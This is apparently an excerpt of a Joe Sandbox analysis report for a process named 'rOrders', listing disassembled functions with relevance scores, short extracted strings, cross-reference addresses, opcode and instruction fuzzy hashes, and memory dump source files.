Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
API String ID: 0-1434930255
Opcode ID: 03acef8a4a3d635de49424bba53a202dd98d33882e55d71d977b24a2b2cb5332
Instruction ID: 0e758efb11c6b5ceb6e0ce8048eccd4d5c61c3323b0377c328099c7a83e99f89
Opcode Fuzzy Hash: 03acef8a4a3d635de49424bba53a202dd98d33882e55d71d977b24a2b2cb5332
Instruction Fuzzy Hash: 98818474E002189FDB14DFA9D994A9DBBF2BF88300F1490AAE819AB365DB705981CF50

Function 02B5BBD3 Relevance: 6.4, Strings: 5, Instructions: 183COMMON

Download Yara Rule

Strings

LjVp, xrefs: 02B5BDC5
PHsq, xrefs: 02B5BE38
PHsq, xrefs: 02B5BE27
0oVp, xrefs: 02B5BC42
LjVp, xrefs: 02B5BDAF

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
API String ID: 0-1434930255
Opcode ID: 74ddccafafe6e0d7198678f1302a0a8ab34e0daab396799b69da90fd7f9660d9
Instruction ID: 1853eb7a599a3f8c42444519084cdaa238dba369a585122a9174b0265011f62f
Opcode Fuzzy Hash: 74ddccafafe6e0d7198678f1302a0a8ab34e0daab396799b69da90fd7f9660d9
Instruction Fuzzy Hash: 27819274E00218DFDB18DFA9D984A9DFBF2BF88304F1491A9E819AB355DB309981CF50

Function 02B56880 Relevance: 5.3, Strings: 4, Instructions: 328COMMON

Download Yara Rule

Strings

,wq, xrefs: 02B56A00
,wq, xrefs: 02B569F2
(osq, xrefs: 02B56988
(osq, xrefs: 02B5697A

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID: (osq$(osq$,wq$,wq
API String ID: 0-3303631882
Opcode ID: c7b682645cb0d7b3c728fd72eb2fcd42e5554dab95ebcddafbc6d69a73a637ad
Instruction ID: 35fdc75fe307a7a39c90787f7d242abec389947a038fa717cecade25308c80b0
Opcode Fuzzy Hash: c7b682645cb0d7b3c728fd72eb2fcd42e5554dab95ebcddafbc6d69a73a637ad
Instruction Fuzzy Hash: 7BD11D71A00129DFCB14CFA9C984BADBBFAFF88344F958199E815AB265D730DD81CB50

Function 02B5B4F3 Relevance: 3.9, Strings: 3, Instructions: 153COMMON

Download Yara Rule

Strings

0oVp, xrefs: 02B5B562
PHsq, xrefs: 02B5B747
PHsq, xrefs: 02B5B758

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID: 0oVp$PHsq$PHsq
API String ID: 0-255689168
Opcode ID: 42d0e8c927f82b3efe6dd8b1514ea29bdff9a75c7d6df5fbf57923cbfb7668e1
Instruction ID: 97bb00340c090468bce8fc8b4cd94f92b5ab0e9774ebd9fd6e67adb828cf0da7
Opcode Fuzzy Hash: 42d0e8c927f82b3efe6dd8b1514ea29bdff9a75c7d6df5fbf57923cbfb7668e1
Instruction Fuzzy Hash: E56191B5E002189FDB18DFAAD994A9DFBF2FF88304F149069E815AB365DB309941CF50

Function 02B59858 Relevance: 3.4, Strings: 2, Instructions: 853COMMON

Download Yara Rule

Strings

(osq, xrefs: 02B59C78
4'sq, xrefs: 02B5A273

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID: (osq$4'sq
API String ID: 0-2651803416
Opcode ID: 5058dc6ee7d15b5b803ccff043678214c83eb25ca970286b9a473aea926f2da6
Instruction ID: 5365382798a5c2daec7563e49bb2cf2831ebcd35ed8abe09c7e7ee02654b0c6e
Opcode Fuzzy Hash: 5058dc6ee7d15b5b803ccff043678214c83eb25ca970286b9a473aea926f2da6
Instruction Fuzzy Hash: AC727075A00619DFCB15CF68C984BAEBBF2FF89304F158695E815AB391D730E981CB90

Function 02B56108 Relevance: 3.0, Strings: 2, Instructions: 514COMMON

Download Yara Rule

Strings

(osq, xrefs: 02B56642
Hwq, xrefs: 02B5650E

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID: (osq$Hwq
API String ID: 0-1668724233
Opcode ID: 3421493cbe8b009569387be4d59faf3169338de4b3963711e5aa143c9128975f
Instruction ID: 55488d2072e323573a2ab324b5cca22a15e6174161077792a477aa5591f12f20
Opcode Fuzzy Hash: 3421493cbe8b009569387be4d59faf3169338de4b3963711e5aa143c9128975f
Instruction Fuzzy Hash: F3128C71A002298FDB18DFA9C854BAEBBF6FF88304F548569E9159B394DF309D41CB90

Function 069C8BF2 Relevance: 2.7, Strings: 2, Instructions: 214COMMON

Download Yara Rule

Strings

PHsq, xrefs: 069C8EAB
PHsq, xrefs: 069C8E9A

Memory Dump Source

Source File: 00000004.00000002.4556505338.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_69c0000_rOrders.jbxd

Similarity

API ID:
String ID: PHsq$PHsq
API String ID: 0-3507005907
Opcode ID: b4dd8b0741653e77e225ed404a7977c3241d10f7bde3804a12a83913af0f1dd5
Instruction ID: 20b72dba00d992e743eed92bc7e6a2bff549aa1b7cdf79f8d79e2713cf988bc7
Opcode Fuzzy Hash: b4dd8b0741653e77e225ed404a7977c3241d10f7bde3804a12a83913af0f1dd5
Instruction Fuzzy Hash: 6D910370E01218CFDB68CFA9C984AEDBBF2BF89310F24846AD419AB755DB305945CF50

Function 069C11A0 Relevance: .7, Instructions: 745COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4556505338.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_69c0000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f097ebdcb7a063af49820666f94963f54d0152cf7b93dd75307fa5782db7222
Instruction ID: 4b242533348f00a0d6f6f3681c3c713b7301848597002870762374daf2583f69
Opcode Fuzzy Hash: 8f097ebdcb7a063af49820666f94963f54d0152cf7b93dd75307fa5782db7222
Instruction Fuzzy Hash: 0E826C74E012289FDB64DF69C998BDDBBB2BB89310F1081EA980DA7255DB305EC1CF45

Function 02B5F007 Relevance: .7, Instructions: 715COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ac2d063992aa24a814fda8178f22568018248ea2f137ce0575303cfef84959a
Instruction ID: 54724824550ae037a855884b91d22152773d9c70ba65db79c8beb70304ff7673
Opcode Fuzzy Hash: 4ac2d063992aa24a814fda8178f22568018248ea2f137ce0575303cfef84959a
Instruction Fuzzy Hash: 3F72B074E012298FDB64DF69C994BE9BBB2BB49304F1491E9D808AB355DB349EC1CF40

Function 069C8608 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4556505338.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_69c0000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbdeebb53b754942423139fed4c7b946b4b8fccd452501950b3c920a0b51243b
Instruction ID: 297e5f1577cedfc39b78df0badaa295e7d7f37faa537f777c49409d569423335
Opcode Fuzzy Hash: dbdeebb53b754942423139fed4c7b946b4b8fccd452501950b3c920a0b51243b
Instruction Fuzzy Hash: E5E1D7B4E01218CFDB54DFA5C994B9DBBB2BF48304F2081A9D408A7394DB355E85CF51

Function 069C0D48 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4556505338.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_69c0000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 456a1ba8fdb0ba5d85912b625b270d00c04f783d88f3e3d3a633b48ff16ccd02
Instruction ID: 39861819814beabf680a63c4c294d51f4ffa55b20960d0d7db999b990260639c
Opcode Fuzzy Hash: 456a1ba8fdb0ba5d85912b625b270d00c04f783d88f3e3d3a633b48ff16ccd02
Instruction Fuzzy Hash: FEC1C374E00218CFDB58DFA5D994B9DBBB2BF88304F2080A9D809AB355DB359E81DF51

Function 069CB6E8 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4556505338.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_69c0000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4b36515d7978a61a75391d43f246d975171c5705d9dca1a379121b70968e7a9
Instruction ID: 8990e147336916a3b129de797c8da98917ed280b29a7c920921911c96fb25c18
Opcode Fuzzy Hash: b4b36515d7978a61a75391d43f246d975171c5705d9dca1a379121b70968e7a9
Instruction Fuzzy Hash: 32A192B5E012188FEB68CF6AC945B9DFBF2AF89310F14C0AAD40DA7254DB345A85CF51

Function 069CD670 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4556505338.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_69c0000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af70c4f804fe09ca61922beb46627018977ef1cdd5ed5af50a7f1ee0e1531db6
Instruction ID: 4dc4cc28eb1b84e903bf8ffed97399cfa666c6dd9d25b69a4977f43f5fa4db83
Opcode Fuzzy Hash: af70c4f804fe09ca61922beb46627018977ef1cdd5ed5af50a7f1ee0e1531db6
Instruction Fuzzy Hash: 6DA1A2B5E012188FEB68CF6AC944B9DFBF2BF89310F14D0AAD409A7254DB345A85CF51

Function 069CC388 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4556505338.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_69c0000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e666766bbc4faeb64263565b2521318bd6d1109ff3668b43fef0f8cf1090575
Instruction ID: cf52b2eeac8bbdeda8fa91976f38caf3e6b4150214e36e4b8a65a39bf189b887
Opcode Fuzzy Hash: 7e666766bbc4faeb64263565b2521318bd6d1109ff3668b43fef0f8cf1090575
Instruction Fuzzy Hash: 5CA191B5E05218CFEB68CF6AC944B9DBAF2AF89310F14C0AAD40DA7254DB345A85CF51

Function 069CA408 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4556505338.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_69c0000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4549a54ac7fb3421d82d6ae5cb9a854f18c79cbc08b84f62f9f48125dae433da
Instruction ID: 05eb2976a7a293918611fdbb2bbaaaeedc69c3c00f3766b5d8d282029509c00c
Opcode Fuzzy Hash: 4549a54ac7fb3421d82d6ae5cb9a854f18c79cbc08b84f62f9f48125dae433da
Instruction Fuzzy Hash: C5A191B5E016188FEB68CF6AC944B9DBBF2BF89310F14C0AAD409A7254DB345A85CF51

Function 069CC9D8 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4556505338.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_69c0000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abe356ec9f0257efff825b2321ffbafe86797ec114ef0a3eb155c080a75c714c
Instruction ID: b564593f74cb554d8b30dc2f77e7e9679473689804cda2cdba868d3a6ab8ea1f
Opcode Fuzzy Hash: abe356ec9f0257efff825b2321ffbafe86797ec114ef0a3eb155c080a75c714c
Instruction Fuzzy Hash: AEA1A2B1E01218CFEB68CF6AC944B9DBAF2AF89310F14C4AAD40DA7254DB345A85CF51

Function 069CBD38 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4556505338.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_69c0000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af2c5a59cf85441f64ac714815fc69411fe777477e274abf1c5461b388cb925d
Instruction ID: 4e88373aa94cea7417ff5edc0bbf5cb0f795ef076e79d7421bf85ffd351ea6b6
Opcode Fuzzy Hash: af2c5a59cf85441f64ac714815fc69411fe777477e274abf1c5461b388cb925d
Instruction Fuzzy Hash: 42A1A1B5E012188FEB68CF6AC944B9DBBF2BF89310F14C0AAD40DA7255DB345A85CF51

Function 069CAA58 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4556505338.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_69c0000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de53b8a51d0856c567fd385112686ed5a0f82ef80614c137915ae1d699da6b8c
Instruction ID: 00757fe5ac7d58df13309148ffb15e873cb5f98b78a69f43682995d98bc00aec
Opcode Fuzzy Hash: de53b8a51d0856c567fd385112686ed5a0f82ef80614c137915ae1d699da6b8c
Instruction Fuzzy Hash: 75A193B5E012188FEB68CF6AD944B9DFBF2BF89310F14C0AAD409A7254DB345A85CF51

Function 069CB0A0 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4556505338.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_69c0000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11a6c8c66603c612fb9b9c856b953c914188fe4d0ebda6fccbcd2364eedf03a2
Instruction ID: 9f45261442bbece1a8e0f493769003894de09a4ea358371588d60975a9305e2b
Opcode Fuzzy Hash: 11a6c8c66603c612fb9b9c856b953c914188fe4d0ebda6fccbcd2364eedf03a2
Instruction Fuzzy Hash: 12A1A375E012288FEB68CF6AC945B9DFBF2BF89310F14C1AAD408A7254DB345A85CF51

Function 069CD028 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4556505338.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_69c0000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18eb3a49d39a25274348d7af8b0b7494d64739fbf8c12a9ad9c56f1b31be1b79
Instruction ID: b65f412639282c2bdee32e7ac45b6a053bd3e6d37c36f391ab4adca3948b1ddf
Opcode Fuzzy Hash: 18eb3a49d39a25274348d7af8b0b7494d64739fbf8c12a9ad9c56f1b31be1b79
Instruction Fuzzy Hash: 2DA181B5E012188FEB68CF6AC944B9DFBF2AF89310F14C0AAD40DA7254DB345A85CF51

Function 069CB08F Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4556505338.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_69c0000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9226cd5d1993280bb3fb1bffc5c880a6e2e62b25549c145f019a68638dbdfae3
Instruction ID: 06961885fa9be44216aa3e96341c93079c0e31d20750a713e481d184c49d1f66
Opcode Fuzzy Hash: 9226cd5d1993280bb3fb1bffc5c880a6e2e62b25549c145f019a68638dbdfae3
Instruction Fuzzy Hash: 2881C670E016188FEB68CF6AC945B9EFBF2AF89310F14C1AAD40DA7255DB344A85CF11

Function 069CD018 Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4556505338.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_69c0000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d8ef6879268a31e946061d16d2fbf0dbc49473e101bcea923d253a27ba162b9
Instruction ID: 5f48a1b15ecccd7e30a39bba30e02adcf6830c129419d70f8ba0fbb0c95ea5d8
Opcode Fuzzy Hash: 9d8ef6879268a31e946061d16d2fbf0dbc49473e101bcea923d253a27ba162b9
Instruction Fuzzy Hash: 0B718671E016188FEB68CF6AC944B9EFBF2AF89310F14C0AAD40DA7254DB345A85CF51

Function 069CAA48 Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4556505338.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_69c0000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c990d1c1b12df33d46238ff99bfb8859d688d4748e7d4e7ca32cec604f3c86c
Instruction ID: 19e09db876dd22e4c5baa019bd69feb8c7b23077f492446a93d53a7c2498aa0f
Opcode Fuzzy Hash: 3c990d1c1b12df33d46238ff99bfb8859d688d4748e7d4e7ca32cec604f3c86c
Instruction Fuzzy Hash: E67185B1E016188FEB68CF6AC944B9DFBF2AF89310F14C0AAD40DA7254DB345A85CF51

Function 069C85F8 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4556505338.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_69c0000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7271ba068102624bbcd89a5dd27253797cf1820d866742f212d0c31286fdc8d6
Instruction ID: 4ff1aead9c3f8428d89cf42a20ec3df4bae5900e92d337c7abddb05c84f6e0d7
Opcode Fuzzy Hash: 7271ba068102624bbcd89a5dd27253797cf1820d866742f212d0c31286fdc8d6
Instruction Fuzzy Hash: 8A5106B1D00618CBEB58DFAACA447DEBBB2BF88310F24C169C419AB254EB714946CF55

Function 069CC378 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4556505338.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_69c0000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a3548cc73167371616e5e7c2eff23657de40993a9356205cde8586bb77dbe87
Instruction ID: fc8a94da2ad8584edfe311d59a271b5d8867114d579736d22f11992f9a0bd6fb
Opcode Fuzzy Hash: 0a3548cc73167371616e5e7c2eff23657de40993a9356205cde8586bb77dbe87
Instruction Fuzzy Hash: A84199B1E016189BEB58CF6BCD557CAFAF3AFC9300F14C0AAD40CA6255DB740A868F55

Function 069CC9C8 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4556505338.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_69c0000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de0e6b0d515e0f19a74a3541285133e9beb80bca2cbbaa2ca1dba07f3ab74a92
Instruction ID: b23ec4170dfb7065f00d48b198c16793e54f32612db4b7acf2962eabef0edd7f
Opcode Fuzzy Hash: de0e6b0d515e0f19a74a3541285133e9beb80bca2cbbaa2ca1dba07f3ab74a92
Instruction Fuzzy Hash: 484188B1E016189BEB58CF6BDD447DAFAF3AFC8310F14C1AAC50CA6254DB740A858F55

Function 069CBD28 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4556505338.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_69c0000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fec3646edbcd64468f41079e1c6de59f0ff323fcfdfb3e3c935716b825c10adc
Instruction ID: 2d367bee1c0ac7f1a112d207d2dcb2bbc056bb73c611d6aa0a39cc522911c350
Opcode Fuzzy Hash: fec3646edbcd64468f41079e1c6de59f0ff323fcfdfb3e3c935716b825c10adc
Instruction Fuzzy Hash: 59418AB1E016189BEB58CF6BCD457CAFAF3AFC8310F14C1AAD50CA6254DB340A858F55

Function 069CB6D9 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4556505338.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_69c0000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 692b2e0921475379e70a1dd5075f618a001794a4a9a083482db3f78f612cf6fe
Instruction ID: 888587127cc8046b3c08ad1be6e9670dacde6fb83c4641d393071dd75b8e51b3
Opcode Fuzzy Hash: 692b2e0921475379e70a1dd5075f618a001794a4a9a083482db3f78f612cf6fe
Instruction Fuzzy Hash: 574168B1E016189BEB58CF6BC9457CAFAF3AFC8310F14C1AAD50CA6264DB740A858F51

Function 069CA3F8 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4556505338.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_69c0000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e9a2be3153516fb4621a445719dd483bf9fc0b42c6817611b9844652084898e
Instruction ID: a0dd4867ec3ff204e75424d5fff4900e1de5e3bf3dde17c64adf8456a9790b72
Opcode Fuzzy Hash: 1e9a2be3153516fb4621a445719dd483bf9fc0b42c6817611b9844652084898e
Instruction Fuzzy Hash: 8B4158B1E016188BEB58CF6BDD457CAFAF3AFC9310F14C1AAD50CA6264DB740A858F51

Function 069C0D39 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4556505338.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_69c0000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41deb76f10bd686bd09e77e8de7f61f2d25a4fa977d6f2290bef5c2180da66cf
Instruction ID: ad6ecc615dec4e4d46218fd78191b25134460b218e644379f10813d207168d29
Opcode Fuzzy Hash: 41deb76f10bd686bd09e77e8de7f61f2d25a4fa977d6f2290bef5c2180da66cf
Instruction Fuzzy Hash: 89412671E00648CBEB58DFEAD9446AEBBB2BF88310F20C129C415AB354DB355946CF45

Function 069CD661 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4556505338.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_69c0000_rOrders.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca47e586a956999c6ce285b38dc25c9e2c3667180a6cd3f7dfab47253007c84a
Instruction ID: 51c8876e23a9bfe857278ad23c6e0a0106fccb8727de5c66ff48fb07d8c28521
Opcode Fuzzy Hash: ca47e586a956999c6ce285b38dc25c9e2c3667180a6cd3f7dfab47253007c84a
Instruction Fuzzy Hash: 994168B1E016188BEB58CF6BD9457CAFAF3AFC8310F14C1AAD50CA6254DB740A85CF51

Function 02B56E58 Relevance: 10.5, Strings: 8, Instructions: 473COMMON

Download Yara Rule

Strings

(osq, xrefs: 02B5701A
,wq, xrefs: 02B57308
,wq, xrefs: 02B572F8
(osq, xrefs: 02B56F7D
(osq, xrefs: 02B57377
(osq, xrefs: 02B56E96
(osq, xrefs: 02B57367
(osq, xrefs: 02B56F51

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID: (osq$(osq$(osq$(osq$(osq$(osq$,wq$,wq
API String ID: 0-1935560061
Opcode ID: 78358074681045e46d7f761667bc8a6d8e167587c8ab89dd4dc30f53a02ef8e2
Instruction ID: a6be5f8a1fc5ca183d3b5160320727c92797ff1846e890fdd96ffb3e22d47e25
Opcode Fuzzy Hash: 78358074681045e46d7f761667bc8a6d8e167587c8ab89dd4dc30f53a02ef8e2
Instruction Fuzzy Hash: 3B125731B002198FCB14DFA9D884B9EBBF2FF89314F158599E8499B2A1DB31ED41CB50

Function 02B577F0 Relevance: 3.2, Strings: 2, Instructions: 688COMMON

Download Yara Rule

Strings

$sq, xrefs: 02B58314
$sq, xrefs: 02B58337

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID: $sq$$sq
API String ID: 0-1184984226
Opcode ID: ecb2322d0b6a46de29caf5636e49975889d6299348a1e0f746089dbc2d3d89e8
Instruction ID: bb7abe5e748f7decdad57703fd34de70d9606bb1f3fdb37d74e390c812ca7ec2
Opcode Fuzzy Hash: ecb2322d0b6a46de29caf5636e49975889d6299348a1e0f746089dbc2d3d89e8
Instruction Fuzzy Hash: E6522D74A102198FEB249BE4C860B9EBB73FF94300F1080AAD61A6B395DF359D85DF51

Function 02B587E9 Relevance: 2.8, Strings: 2, Instructions: 324COMMON

Download Yara Rule

Strings

4'sq, xrefs: 02B58837
4'sq, xrefs: 02B58811

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID: 4'sq$4'sq
API String ID: 0-780347173
Opcode ID: d85b76dd62daec749da2d2ff68a779f42cde940f19a73a51fc929fc47cf6d21d
Instruction ID: cb70b8b50c9e9ae78472387c6992ea5d88161bb9b185e0c2518eb3b10c56273d
Opcode Fuzzy Hash: d85b76dd62daec749da2d2ff68a779f42cde940f19a73a51fc929fc47cf6d21d
Instruction Fuzzy Hash: 99B15FB07145218FDB159B29C969B39379AEF85704F1844EAE912CF3B1EB2ADCC1C741

Function 02B556A8 Relevance: 2.8, Strings: 2, Instructions: 264COMMON

Download Yara Rule

Strings

Hwq, xrefs: 02B55793
Hwq, xrefs: 02B557C6

Memory Dump Source

Source File: 00000004.00000002.4535776413.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b50000_rOrders.jbxd

Similarity

API ID:
String ID: Hwq$Hwq
API String ID: 0-741242263
Opcode ID: bde66df7f169da10ed601bf268eabd763d41810c04d61b4843522ba01049fd4d
Instruction ID: 323f6407204b79edba8463756f3f1b6d6402fbe3e6903b15d65d10577405d3f3
Opcode Fuzzy Hash: bde66df7f169da10ed601bf268eabd763d41810c04d61b4843522ba01049fd4d
Instruction Fuzzy Hash: 2F91E2357042648FDB259F68C894B6E7BE2FF88305F5488A9E9468B385DF38DC41CB91

Function 069C23E0 Relevance: 2.7, Strings: 2, Instructions: 240COMMON

Download Yara Rule

Strings

LRsq, xrefs: 069C23FC
LRsq, xrefs: 069C2529

Memory Dump Source

Source File: 00000004.00000002.4556505338.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_69c0000_rOrders.jbxd

Similarity

API ID:
